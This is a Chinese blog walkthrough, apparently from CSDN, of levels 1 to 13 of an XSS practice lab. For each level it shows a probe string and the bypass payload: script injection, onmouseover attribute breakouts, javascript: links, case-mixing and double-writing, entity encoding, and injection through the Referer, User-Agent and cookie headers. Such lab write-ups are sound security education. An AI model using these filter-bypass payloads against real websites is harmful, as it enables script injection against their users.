xss-challenge(挑战之旅1~13)

本文介绍了作者在一系列XSS挑战中的历程,从level1到level13,详细讲解了每个级别的解决方案。通过输入不同的超级无敌xss代码,观察过滤规则,利用事件注入、大小写转换、ASCII编码等技巧绕过过滤机制。挑战涉及了对标签、属性、协议的理解和利用,展示了XSS攻击的各种策略。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

好小子!开始我们的XSS挑战之旅吧!

在这里插入图片描述

超级无敌xss代码

<sCr<ScRiPt>IPT>OonN'"\/ (hrHRefEF)</sCr</ScRiPt>IPT>

可以使用hackbar,也可以直接在URL的name上输入超级无敌代码,进行观察过滤了哪些字母或字符。可以使用下面两种方法观察

  • 查看源代码(Ctrl+F4)
  • 查看文档目录树(F12)
level1:

点开图片发现,直接欢迎用户test1,

在这里插入图片描述

  • 按F12,打开backbar

在这里插入图片描述

  • 使用超级无敌代码进行观察

  • <sCr<ScRiPt>IPT>OonN'"\/ (hrHRefEF)</sCr</ScRiPt>IPT>
    

    在这里插入图片描述

    在这里插入图片描述

  • 可以看到,代码并没有被过滤掉

  • 输入

  • <script>alert(/xss/)</script>
    

    在这里插入图片描述

    在这里插入图片描述

  • 点击确认,下一关

level2:

在这里插入图片描述

  • 使用超级无敌xss代码

  • <sCr<ScRiPt>IPT>OonN'"\/ (hrHRefEF)</sCr</ScRiPt>IPT>
    

    在这里插入图片描述

    在这里插入图片描述

  • 闭合标签,输入以下xss代码

  • "><script>alert(/xss/)</script>
    
  • 在这里插入图片描述

level3:

在这里插入图片描述

  • 超级无敌的xss代码代码走起

  • <sCr<ScRiPt>IPT>OonN'"\/ (hrHRefEF)</sCr</ScRiPt>IPT>
    

-在这里插入图片描述

  • 可以看到,“<” 被转换成了 比较操作符。换个思路,构造响应事件进行注入

  • 在这里插入图片描述

    在这里插入图片描述

  • ’onmouseover='alert(/xss/)'#发现多了一个单引号,无法闭合
    'onmouseover='alert(/xss/)#写完后,没有反应,需要将鼠标移到代码框。即可过关。onmouseover就是鼠标移动响应事件
    
  • 在这里插入图片描述

level4:

在这里插入图片描述

  • 很好,继续加油!超级无敌xss代码,走起

  • <sCr<ScRiPt>IPT>OonN'"\/ (hrHRefEF)</sCr</ScRiPt>IPT>
    
  • 在这里插入图片描述

  • 继续使用onmouseover,鼠标响应事件

  • ’onmouseover='alert(/xss/)'#观察发现,是双引号。修改成双引号
    "onmouseover="alert(/xss/)
    
  • 在这里插入图片描述

  • 将鼠标划到搜索框进行鼠标移动响应事件

    在这里插入图片描述

level5:

在这里插入图片描述

  • xss超级代码走起

  • <sCr<ScRiPt>IPT>OonN'"\/ (hrHRefEF)</sCr</ScRiPt>IPT>
    
  • 在这里插入图片描述

  • script和on都有下划线,href和“<"没有被过滤,使用伪协议

  • "><a href='javascript:alert(/xss/)'>click me!</a>#点我
    
  • 在这里插入图片描述

level6:
  • 使用超级无敌xss代码

  • <sCr<ScRiPt>IPT>OonN'"\/ (hrHRefEF)</sCr</ScRiPt>IPT>
    
  • 在这里插入图片描述

    在这里插入图片描述

  • 观察得出大小写没有被过滤,可以试试新思路。就决定是你了,大小写

  • "><scRscript>alert(/xss/)</ScRipt>
    
  • 在这里插入图片描述

level7:

在这里插入图片描述

  • 宇宙超级无敌xss实验代码,走起

  • <sCr<ScRiPt>IPT>OonN'"\/ (hrHRefEF)</sCr</ScRiPt>IPT>
    
  • 在这里插入图片描述

  • on、script、<、都被过滤。非常好!可以使用大小写加双写了

  • "><ScRscriptiPt>alert(/xss/)</ScscriptRiPt>
    
  • 在这里插入图片描述

level8:

在这里插入图片描述

  • 每次都要来一次,超级无敌宇宙第一xss代码,走起!

  • <sCr<ScRiPt>IPT>OonN'"\/ (hrHRefEF)</sCr</ScRiPt>IPT>
    
  • 在这里插入图片描述

  • 发现实验的代码只有href能用,但是在下面的红框中,表示href有下划线,且代码书写在友情连接里,代码写完后,点击友情连接进行跳转。使用伪协议,进行ASCII编码

  • 在这里插入图片描述

    level9:

    在这里插入图片描述

    • 宇宙无敌超级xss代码走起

    • <sCr<ScRiPt>IPT>OonN'"\/ (hrHRefEF)</sCr</ScRiPt>IPT>
      
    • 竟然显示不合法

    -在这里插入图片描述

    • 使用http://www.baidu.com看看会出现什么

    -在这里插入图片描述

    • 哦豁,竟然合法,猜测是不是需要加“http://”

    • &#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;:alert('http://')
      
    • 在这里插入图片描述

    level10:

    在这里插入图片描述

    • 最强宇宙无敌xss代码走起

    • <sCr<ScRiPt>IPT>OonN'"\/ (hrHRefEF)</sCr</ScRiPt>IPT>
      
    • 在这里插入图片描述

    • 没有找到。发现下面有三个t_link、t_history、t_sort。在hackbar里面给这三个进行赋值

    • t_sort="onmouseover="alert(/xss/)" #发现只有t_sort能够插入
      
    • 在这里插入图片描述

    • 但是type的属性是hidden,进行修改。完整代码

    • t_sort="onmouseover="alert(/xss/)" type="text"
      
    • 在这里插入图片描述

    level11:

    在这里插入图片描述

    • 太阳系最强xss代码

    • <sCr<ScRiPt>IPT>OonN'"\/ (hrHRefEF)</sCr</ScRiPt>IPT>
      
    • 在这里插入图片描述

    • 和第十关一样,根据经验,这个t_ref,应该是Referer。使用hackbar,勾选Referer,在Referer框里填写一下代码

    • "onmouseover="alert(/xss/)" type="text"
      
    • 在这里插入图片描述

    • 在这里插入图片描述

    level12:

    在这里插入图片描述

  • 最强宇宙代码,走起

  • <sCr<ScRiPt>IPT>OonN'"\/ (hrHRefEF)</sCr</ScRiPt>IPT>
    

-在这里插入图片描述

  • t_ua应该是User-Agent,使用hackbar,注入以下鼠标响应事件

  • "onmouseover="alert(/xss/)" type="text"
    
  • 在这里插入图片描述

  • 在这里插入图片描述

level13:

在这里插入图片描述

  • 宇宙最强xss代码,走起

  • <sCr<ScRiPt>IPT>OonN'"\/ (hrHRefEF)</sCr</ScRiPt>IPT>
    
  • t_cook 应该是cookie值,使用hackbar,注入以下代码

  • t_cook="onmouseover="alert(/xss/)" type="text"
    
  • 在这里插入图片描述

-在这里插入图片描述

level14:

在这里插入图片描述

  • 未完待续…
    `
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值